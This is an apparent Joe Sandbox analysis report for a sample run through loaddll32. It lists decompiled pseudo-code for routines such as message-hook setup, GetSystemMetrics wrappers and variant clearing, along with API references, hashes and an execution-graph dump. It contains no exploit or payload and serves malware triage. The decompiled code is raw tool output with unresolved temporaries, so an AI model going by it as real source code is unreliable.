                          • Instruction Fuzzy Hash: 583178A1644389CBD312EB24BC167A537D8EB12301F94C375E8858B2D2DFFC8849C769
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0073714C(void* __ecx) {
                          				void* _t2;
                          				DWORD* _t7;
                          
                          				_t2 =  *0x76fb1c; // 0x23f184c
                          				if( *((char*)(_t2 + 0xa5)) == 0) {
                          					if( *0x76fb34 == 0) {
                          						_t2 = SetWindowsHookExA(3, 0x737108, 0, GetCurrentThreadId());
                          						 *0x76fb34 = _t2;
                          					}
                          					if( *0x76fb30 == 0) {
                          						_t2 = CreateEventA(0, 0, 0, 0);
                          						 *0x76fb30 = _t2;
                          					}
                          					if( *0x76fb38 == 0) {
                          						_t2 = CreateThread(0, 0x3e8,  &M007370AC, 0, 0, _t7);
                          						 *0x76fb38 = _t2;
                          					}
                          				}
                          				return _t2;
                          			}

                          0x0073714d
                          0x00737159
                          0x00737162
                          0x00737174
                          0x00737179
                          0x00737179
                          0x00737185
                          0x0073718f
                          0x00737194
                          0x00737194
                          0x007371a0
                          0x007371b3
                          0x007371b8
                          0x007371b8
                          0x007371a0
                          0x007371be

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 00737164
                          • SetWindowsHookExA.USER32 ref: 00737174
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00739951,?,?,023F184C,00000000,?,007392F8), ref: 0073718F
                          • CreateThread.KERNEL32 ref: 007371B3
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CreateThread$CurrentEventHookWindows
                          • String ID:
                          • API String ID: 1195359707-0
                          • Opcode ID: efe0956ee3bd36ddd7a39a9b78252c9caa3b623916dfe3ec2e5c96733e8c7268
                          • Instruction ID: 78319218c6178d03ebd39f6268237ceb59ee6e336986eecf3d180eca19cf7f9d
                          • Opcode Fuzzy Hash: efe0956ee3bd36ddd7a39a9b78252c9caa3b623916dfe3ec2e5c96733e8c7268
                          • Instruction Fuzzy Hash: 89F03AF26C8304EEF334AB30EC6AF193694A751B16F205134F209A94D2C3FC5481C669
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00706C9C(void* __eax, int __ecx, long __edx) {
                          				void* _t2;
                          				void* _t4;
                          
                          				_t2 = GlobalHandle(__eax);
                          				GlobalUnWire(_t2);
                          				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
                          				GlobalFix(_t4);
                          				return _t4;
                          			}

                          0x00706c9f
                          0x00706ca6
                          0x00706cab
                          0x00706cb1
                          0x00706cb6

                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Global$AllocHandleWire
                          • String ID:
                          • API String ID: 2210401237-0
                          • Opcode ID: b3c3200dcf28e66005d7d6615d4713dcd35b49e86f5b1bd8be8d9eaaba0cf08f
                          • Instruction ID: 3654d3cf6876641bc8ad2422513a703d55a784e62fcbd35eaea7cc3a8aaad82f
                          • Opcode Fuzzy Hash: b3c3200dcf28e66005d7d6615d4713dcd35b49e86f5b1bd8be8d9eaaba0cf08f
                          • Instruction Fuzzy Hash: E7B009E88A0280FDE91473B85C2FD7F009C98A5F493808B887405E2082E86CAA240035
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E00728204(void* __eax, void* __ebx, void* __esi) {
                          				intOrPtr* _v8;
                          				intOrPtr _v12;
                          				char _v16;
                          				intOrPtr _v20;
                          				void* _t75;
                          				void* _t112;
                          				intOrPtr _t125;
                          				intOrPtr _t134;
                          				void* _t150;
                          				void* _t153;
                          				void* _t154;
                          				intOrPtr _t155;
                          
                          				_t153 = _t154;
                          				_t155 = _t154 + 0xfffffff0;
                          				_v20 = 0;
                          				_t112 = __eax;
                          				_push(_t153);
                          				_push(0x728396);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t155;
                          				_t148 =  *((intOrPtr*)(__eax + 0x10));
                          				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 8)) != 1) {
                          					if( *((intOrPtr*)(__eax + 0xc)) == 0) {
                          						_t149 =  *((intOrPtr*)(__eax + 0x10));
                          						if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x10)) + 8)) <= 0 ||  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC(_t149, 0) + 4)))) + 0x18))() == 0) {
                          							L0070B9C0(0x727ec8, 1);
                          							L00703A00();
                          						} else {
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_t112 + 0x10)), 0) + 4)))) + 0x1c))();
                          						}
                          						goto L17;
                          					} else {
                          						_v8 = E00703244(1);
                          						_push(_t153);
                          						_push(0x728331);
                          						_push( *[fs:eax]);
                          						 *[fs:eax] = _t155;
                          						_t75 =  *((intOrPtr*)( *((intOrPtr*)(_t112 + 0x10)) + 8)) - 1;
                          						if(_t75 >= 0) {
                          							_v16 = _t75 + 1;
                          							_v12 = 0;
                          							do {
                          								_t150 = L007278AC( *((intOrPtr*)(_t112 + 0x10)), _v12);
                          								if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t150 + 4)))) + 0x18))() != 0) {
                          									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t150 + 4)))) + 0xc))();
                          									 *((intOrPtr*)( *_v8 + 0x3c))();
                          								}
                          								_v12 = _v12 + 1;
                          								_t27 =  &_v16;
                          								 *_t27 = _v16 - 1;
                          							} while ( *_t27 != 0);
                          						}
                          						if( *((intOrPtr*)( *_v8 + 0x14))() - 1 <= 0) {
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(SetForegroundWindow() + 4)))) + 0x1c))();
                          						} else {
                          							 *((intOrPtr*)( *_v8 + 0x90))();
                          							_v12 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t112 + 0xc)))) + 0x10))();
                          							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_v8 + 0x18))() + 4)))) + 0x1c))();
                          						}
                          						_pop(_t134);
                          						 *[fs:eax] = _t134;
                          						_push(0x728380);
                          						return E00703274(_v8);
                          					}
                          				} else {
                          					if( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC(_t148, 0) + 4)))) + 0x18))() != 0) {
                          						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(L007278AC( *((intOrPtr*)(_t112 + 0x10)), 0) + 4)))) + 0x1c))();
                          					}
                          					L17:
                          					_pop(_t125);
                          					 *[fs:eax] = _t125;
                          					return CharNextW(0x72839d);
                          				}
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CharNext
                          • String ID: |Qq
                          • API String ID: 3213498283-638084505
                          • Opcode ID: dca54308d67374028eafc23ca0b9c2035d568ba5b82e1412accc6ad0c94739ec
                          • Instruction ID: 4875f8a86d9a9e84711257b0d8d14eac1f09e80fb2c2681220916cb093dac586
                          • Opcode Fuzzy Hash: dca54308d67374028eafc23ca0b9c2035d568ba5b82e1412accc6ad0c94739ec
                          • Instruction Fuzzy Hash: 87513634A00214CFCB48EF68D99895EB7F1FF89700B2585A4E8059B366CB39ED46DF81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 65%
                          			E0070F220(signed short* __eax, void* __ecx, intOrPtr* __edx) {
                          				intOrPtr* _v16;
                          				void* _t15;
                          				signed short* _t23;
                          				signed short _t34;
                          				intOrPtr* _t35;
                          				void* _t36;
                          
                          				_t12 = __eax;
                          				_push(__ecx);
                          				_t35 = __edx;
                          				_t23 = __eax;
                          				if(( *__eax & 0x0000bfe8) != 0) {
                          					_t12 = E0070EF28(__eax, __ecx);
                          				}
                          				_t34 =  *_t35;
                          				if(_t34 >= 0x14) {
                          					if(_t34 != 0x100) {
                          						if(_t34 != 0x101) {
                          							if((_t34 & 0x00002000) == 0) {
                          								if(L007139DC(_t34, _t36) == 0) {
                          									_push(_t35);
                          									_push(_t23);
                          									L0070D9A8();
                          									_t15 = E0070EBF4(_t14);
                          								} else {
                          									_t15 =  *((intOrPtr*)( *_v16 + 0x28))(0);
                          								}
                          							} else {
                          								_t15 = E0070F04C(_t23, 0x70f218, _t35);
                          							}
                          						} else {
                          							 *_t23 = _t34;
                          							_t23[4] =  *(_t35 + 8);
                          							_t15 =  *0x76f820();
                          						}
                          					} else {
                          						 *_t23 = 0x100;
                          						_t23[4] = 0;
                          						_t15 = E007040BC( &(_t23[4]),  *(_t35 + 8));
                          					}
                          				} else {
                          					_push(_t35);
                          					_push(_t23);
                          					L0070D9A8();
                          					_t15 = E0070EBF4(_t12);
                          				}
                          				return _t15;
                          			}

                          APIs
                          • VariantCopy.OLEAUT32(?), ref: 0070F241
                            • Part of subcall function 0070EF28: VariantClear.OLEAUT32(?), ref: 0070EF37
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Variant$ClearCopy
                          • String ID: \p
                          • API String ID: 274517740-2058460253
                          • Opcode ID: b5a2a4af5268cf2e312386f542849161c264fd2f9b59fd79b6661d984630edc9
                          • Instruction ID: 2b9f7241e55d4c6457493aa19cfe56747548422a18580c5f76302f58eeb18932
                          • Opcode Fuzzy Hash: b5a2a4af5268cf2e312386f542849161c264fd2f9b59fd79b6661d984630edc9
                          • Instruction Fuzzy Hash: EB11A074700210C7D730AF68C8C9A5E37D5BF897107108676F44A8B6C6DA3CDC01C292
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			E00720840(void* __ecx, void* __edx) {
                          				void* __ebx;
                          				void* __esi;
                          				intOrPtr _t19;
                          				char _t32;
                          				intOrPtr _t33;
                          				intOrPtr _t35;
                          				void* _t38;
                          				void* _t39;
                          				void* _t40;
                          				intOrPtr _t46;
                          				intOrPtr _t47;
                          				intOrPtr _t48;
                          				intOrPtr _t49;
                          				void* _t50;
                          				void* _t51;
                          
                          				_t40 = __edx;
                          				_t39 = __ecx;
                          				if(__edx != 0) {
                          					_t51 = _t51 + 0xfffffff0;
                          					_t19 = E00703598(_t19, _t50);
                          				}
                          				_t38 = _t40;
                          				_t46 = _t19;
                          				E00703244(0);
                          				_t1 = _t46 + 0x38; // 0x38
                          				L007064A0();
                          				_t47 = L0071FD50(1);
                          				 *((intOrPtr*)(_t46 + 0xc)) = _t47;
                          				 *((intOrPtr*)(_t47 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t47 + 8)) = E00720FC4;
                          				_t5 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t47 + 0x14)) = _t5;
                          				_t48 = E0072027C(1);
                          				 *((intOrPtr*)(_t46 + 0x10)) = _t48;
                          				 *((intOrPtr*)(_t48 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t48 + 8)) = 0x720fe4;
                          				_t10 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t48 + 0x14)) = _t10;
                          				_t49 = E00720548(1);
                          				 *((intOrPtr*)(_t46 + 0x14)) = _t49;
                          				 *((intOrPtr*)(_t49 + 0xc)) = _t46;
                          				 *((intOrPtr*)(_t49 + 8)) = 0x721004;
                          				_t15 = _t46 + 0x38; // 0x38
                          				 *((intOrPtr*)(_t49 + 0x14)) = _t15;
                          				 *((intOrPtr*)(_t46 + 0x20)) = 0xcc0020;
                          				_t32 =  *0x720900; // 0x0
                          				 *((char*)(_t46 + 8)) = _t32;
                          				_t33 =  *0x76f8ec; // 0x23f0b08
                          				E00717360(_t33, _t38, _t39, _t46, _t49);
                          				_t35 = _t46;
                          				if(_t38 != 0) {
                          					E007035F0(_t35);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _t46;
                          			}

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00723C4C,00723C14,?,00000001,00723DAA,?,?,?,00725015,?,?,00724E34,?,0000000E,00000000,?), ref: 00720860
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID: |q$|q
                          • API String ID: 32694325-1594819443
                          • Opcode ID: ae53ac0f4a24c7267bcf46e246d3fb07441774404d13afdf3476d7aede329673
                          • Instruction ID: fa96d12bc7639ce1338dccbf57feb2e4dbd35d75fdea403169b780c281ff6a86
                          • Opcode Fuzzy Hash: ae53ac0f4a24c7267bcf46e246d3fb07441774404d13afdf3476d7aede329673
                          • Instruction Fuzzy Hash: 6B118C71600A11CFC320DF2EE885986FBE9BF44710304862AE459C7B62D379E9588BE0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E00727208(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* __ebp;
                          				void* _t15;
                          				void* _t16;
                          				intOrPtr _t18;
                          				signed int _t19;
                          				void* _t20;
                          				intOrPtr _t21;
                          
                          				_t19 = _a12;
                          				if( *0x76f91f != 0) {
                          					_t16 = 0;
                          					if((_t19 & 0x00000003) != 0) {
                          						L7:
                          						_t16 = 0x12340042;
                          					} else {
                          						_t21 = _a4;
                          						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
                          							goto L7;
                          						}
                          					}
                          				} else {
                          					_t18 =  *0x76f900; // 0x727208
                          					 *0x76f900 = E00726F70(3, _t15, _t18, _t19, _t20);
                          					_t16 =  *0x76f900(_a4, _a8, _t19);
                          				}
                          				return _t16;
                          			}

                          APIs
                          • GetSystemMetrics.USER32 ref: 00727256
                          • GetSystemMetrics.USER32 ref: 00727268
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: MonitorFromPoint
                          • API String ID: 1792783759-1072306578
                          • Opcode ID: 44435b07de230a87270f8d0dc80292d7a29e1d28411e8ec4dcc17111473ac4a1
                          • Instruction ID: 4d96363815d55fb77b7a4ba790e8c6e3bdbe60fe01ca5f3906a0473bd7698113
                          • Opcode Fuzzy Hash: 44435b07de230a87270f8d0dc80292d7a29e1d28411e8ec4dcc17111473ac4a1
                          • Instruction Fuzzy Hash: D9018F31209329EFDB044F50FE49B6A7BB5FB50394F048225F905CB121C3B8AC40C7A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E0070EF28(intOrPtr* __eax, void* __ecx) {
                          				void* _t8;
                          				signed short _t19;
                          				intOrPtr* _t20;
                          
                          				_t13 = __eax;
                          				_t19 =  *__eax;
                          				if(_t19 >= 0x14) {
                          					if(_t19 != 0x100) {
                          						if(_t19 != 0x101) {
                          							if((_t19 & 0x00002000) == 0) {
                          								if(L007139DC(_t19, _t20) == 0) {
                          									L0070D9A0();
                          									_t8 = E0070EBF4(_t7);
                          								} else {
                          									_t8 =  *((intOrPtr*)( *((intOrPtr*)( *_t20)) + 0x24))();
                          								}
                          							} else {
                          								_t8 = E0070EDAC(__eax);
                          							}
                          						} else {
                          							_t8 =  *0x76f818();
                          						}
                          					} else {
                          						 *((short*)(__eax)) = 0;
                          						_t8 = E00704068(__eax + 8);
                          					}
                          				} else {
                          					_push(__eax);
                          					L0070D9A0();
                          					_t8 = E0070EBF4(__eax);
                          				}
                          				return _t8;
                          			}

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: ClearVariant
                          • String ID: \p
                          • API String ID: 1473721057-2058460253
                          • Opcode ID: e06c2019275d83567ccc3780cf4e800c4192998745a3de2da1d022aa1899ac1a
                          • Instruction ID: f18b2b55c3653c79f9384257561712e3f7f6b918306e478d349e13c91bb69a95
                          • Opcode Fuzzy Hash: e06c2019275d83567ccc3780cf4e800c4192998745a3de2da1d022aa1899ac1a
                          • Instruction Fuzzy Hash: BEF06261708212CBCB64BB7899896A927D59F40710B604F75F08A9B2D6CB6CFD45C363
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00727058(int _a4) {
                          				void* __ebx;
                          				void* __ebp;
                          				signed int _t2;
                          				signed int _t3;
                          				int _t8;
                          				void* _t12;
                          				void* _t13;
                          				void* _t17;
                          				void* _t18;
                          
                          				_t8 = _a4;
                          				if( *0x76f91c == 0) {
                          					 *0x76f8f4 = E00726F70(0, _t8,  *0x76f8f4, _t17, _t18);
                          					return GetSystemMetrics(_t8);
                          				}
                          				_t3 = _t2 | 0xffffffff;
                          				_t12 = _t8 + 0xffffffb4 - 2;
                          				__eflags = _t12;
                          				if(__eflags < 0) {
                          					_t3 = 0;
                          				} else {
                          					if(__eflags == 0) {
                          						_t8 = 0;
                          					} else {
                          						_t13 = _t12 - 1;
                          						__eflags = _t13;
                          						if(_t13 == 0) {
                          							_t8 = 1;
                          						} else {
                          							__eflags = _t13 - 0xffffffffffffffff;
                          							if(_t13 - 0xffffffffffffffff < 0) {
                          								_t3 = 1;
                          							}
                          						}
                          					}
                          				}
                          				__eflags = _t3 - 0xffffffff;
                          				if(_t3 != 0xffffffff) {
                          					return _t3;
                          				} else {
                          					return GetSystemMetrics(_t8);
                          				}
                          			}

                          APIs
                          • GetSystemMetrics.USER32 ref: 007270BA
                            • Part of subcall function 00726F70: GetProcAddress.KERNEL32(74EA0000,00000000), ref: 00726FF0
                          • GetSystemMetrics.USER32 ref: 00727080
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: MetricsSystem$AddressProc
                          • String ID: GetSystemMetrics
                          • API String ID: 1792783759-96882338
                          • Opcode ID: 1de9f561cd35e2c2eb5166f8de6081447a125f275aed1873d9cef05de6575b42
                          • Instruction ID: 0d6844468eb0688809911320c5ae846b399357fe962e392e7af7a3ec92e11cf2
                          • Opcode Fuzzy Hash: 1de9f561cd35e2c2eb5166f8de6081447a125f275aed1873d9cef05de6575b42
                          • Instruction Fuzzy Hash: 68F0CD3011C2228ECB395A34BF84B263595A7A2330F64AA31F212862E6C57D9A0CC266
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E00716168(void* __edx) {
                          				void* _t5;
                          				void* _t15;
                          				void* _t20;
                          				void* _t25;
                          				void* _t26;
                          				void* _t27;
                          				void* _t28;
                          
                          				_t20 = __edx;
                          				if(__edx != 0) {
                          					_t28 = _t28 + 0xfffffff0;
                          					_t5 = E00703598(_t5, _t27);
                          				}
                          				_t25 = _t5;
                          				E00703244(0);
                          				 *((intOrPtr*)(_t25 + 4)) = E00703244(1);
                          				_t2 = _t25 + 8; // 0x8
                          				L007064A0();
                          				_t26 = L00715E38(1);
                          				_t3 = _t25 + 4; // 0x6f724767
                          				E00716F20( *_t3, _t26);
                          				 *((char*)(_t26 + 0x10)) = 1;
                          				_t15 = _t25;
                          				if(_t20 != 0) {
                          					E007035F0(_t15);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _t25;
                          			}
                          0x00716168
                          0x0071616d
                          0x0071616f
                          0x00716172
                          0x00716172
                          0x00716179
                          0x0071617f
                          0x00716190
                          0x00716193
                          0x00716197
                          0x007161ae
                          0x007161b0
                          0x007161b5
                          0x007161ba
                          0x007161be
                          0x007161c2
                          0x007161c4
                          0x007161c9
                          0x007161d0
                          0x007161d8

                          APIs
                          • RtlInitializeCriticalSection.KERNEL32(00715D58,?,?,?,0071DF84,00000000,0071DFB9), ref: 00716197
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CriticalInitializeSection
                          • String ID: `Mq$pNq
                          • API String ID: 32694325-1408708686
                          • Opcode ID: 867a7c8712a2f2d87e26529ca43c16c3357d3b65ff8e69652681cb39e7715dde
                          • Instruction ID: d7ebf9980785f7cb37e0aedf5edf774af18c2d4473019eb95dba361821d6a843
                          • Opcode Fuzzy Hash: 867a7c8712a2f2d87e26529ca43c16c3357d3b65ff8e69652681cb39e7715dde
                          • Instruction Fuzzy Hash: 44F06272700541DBC310EB7DDC85A9AB7DAAB85754B088220F4048B3D6DB2E9D5987A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Execution Graph

                          Execution Coverage:4.5%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:760
                          Total number of Limit Nodes:22
                          execution_graph 19302 e302e8 19303 e30303 19302->19303 19304 e3030b 19303->19304 19305 e3038e 19303->19305 19306 e2faa8 RtlEnterCriticalSection 19304->19306 19323 e27620 19305->19323 19308 e30313 19306->19308 19310 e2faa8 RtlEnterCriticalSection 19308->19310 19309 e30399 19311 e3032b 19310->19311 19316 e2f4a0 19311->19316 19313 e30349 19314 e2fab8 RtlLeaveCriticalSection 19313->19314 19315 e30369 19314->19315 19328 e2f27c RtlEnterCriticalSection 19316->19328 19318 e2f4e6 19329 e2f288 RtlLeaveCriticalSection 19318->19329 19320 e2f4b6 19320->19318 19322 e2f378 2 API calls 19320->19322 19321 e2f4fb 19321->19313 19322->19318 19324 e27624 19323->19324 19325 e2762a 19323->19325 19324->19309 19330 e27634 19325->19330 19328->19320 19329->19321 19331 e27677 19330->19331 19332 e2765a 19330->19332 19333 e14100 11 API calls 19331->19333 19334 e1b9fc 56 API calls 19332->19334 19333->19332 19335 e276cf 19334->19335 19336 e14068 11 API calls 19335->19336 19337 e27631 19336->19337 19337->19309 20939 e316b4 20946 e128c8 20939->20946 20942 e31798 ReleaseDC 20943 e3170e GetSystemPaletteEntries 20944 e3177a GetSystemPaletteEntries 20943->20944 20945 e3172e GetSystemPaletteEntries GetSystemPaletteEntries GetSystemPaletteEntries 20943->20945 20944->20942 20945->20942 20947 e128d4 GetDC GetDeviceCaps 20946->20947 20947->20942 20947->20943 18235 e15688 lstrcpyn GetThreadLocale GetLocaleInfoA 18236 e157a2 18235->18236 18237 e156bf 18235->18237 18237->18236 18238 e156cf lstrlen 18237->18238 18239 e156e7 18238->18239 18239->18236 18240 e15734 18239->18240 18241 e1570c lstrcpyn LoadLibraryExA 18239->18241 18240->18236 18242 e1573e lstrcpyn LoadLibraryExA 18240->18242 18241->18240 18242->18236 18243 e15770 lstrcpyn LoadLibraryExA 18242->18243 18243->18236 18900 e7b448 18915 e1615c 18900->18915 18903 e7bad5 18905 e7bae9 StrokePath 18903->18905 18904 e7bdf0 18906 e13f78 7 API calls 18904->18906 18905->18905 18907 e7bb02 18905->18907 18910 e7bdf6 18906->18910 18919 
e29790 18907->18919 18909 e7bb73 18923 e290d4 18909->18923 18912 e7bc26 18913 e7bda3 18912->18913 18914 e7bcfd StrokePath StrokePath StrokePath StrokePath 18912->18914 18914->18912 18916 e16167 18915->18916 18927 e13d0c 18916->18927 18920 e2979a 18919->18920 18995 e29850 FindResourceA 18920->18995 18922 e297c1 18922->18909 18924 e290e1 18923->18924 18925 e29102 18923->18925 18924->18925 18926 e1b9c0 56 API calls 18924->18926 18925->18912 18926->18925 18928 e13d52 18927->18928 18929 e13f78 18928->18929 18930 e13dcb 18928->18930 18933 e13fb0 18929->18933 18936 e13fc1 18929->18936 18941 e13cac 18930->18941 18946 e13eec 18933->18946 18935 e13fba 18935->18936 18937 e13ffc FreeLibrary 18936->18937 18938 e14020 18936->18938 18937->18936 18939 e14029 18938->18939 18940 e1402f ExitProcess 18938->18940 18939->18940 18942 e13ce8 165 API calls 18941->18942 18943 e13cbb 18941->18943 18942->18903 18942->18904 18943->18942 18945 e126cc 25 API calls 18943->18945 18952 e15340 18943->18952 18945->18943 18947 e13ef6 GetStdHandle WriteFile GetStdHandle WriteFile 18946->18947 18948 e13f4d 18946->18948 18947->18935 18949 e13f56 MessageBoxA 18948->18949 18950 e13f69 18948->18950 18949->18950 18950->18935 18953 e15350 GetModuleFileNameA 18952->18953 18954 e1536c 18952->18954 18956 e1557c GetModuleFileNameA RegOpenKeyExA 18953->18956 18954->18943 18957 e155ff 18956->18957 18958 e155bf RegOpenKeyExA 18956->18958 18974 e153c4 GetModuleHandleA 18957->18974 18958->18957 18959 e155dd RegOpenKeyExA 18958->18959 18959->18957 18961 e15688 lstrcpyn GetThreadLocale GetLocaleInfoA 18959->18961 18965 e157a2 18961->18965 18967 e156bf 18961->18967 18963 e15644 RegQueryValueExA 18964 e15666 RegCloseKey 18963->18964 18966 e15662 18963->18966 18964->18954 18965->18954 18966->18964 18967->18965 18968 e156cf lstrlen 18967->18968 18969 e156e7 18968->18969 18969->18965 18970 e15734 18969->18970 18971 e1570c lstrcpyn LoadLibraryExA 18969->18971 18970->18965 18972 e1573e lstrcpyn LoadLibraryExA 18970->18972 
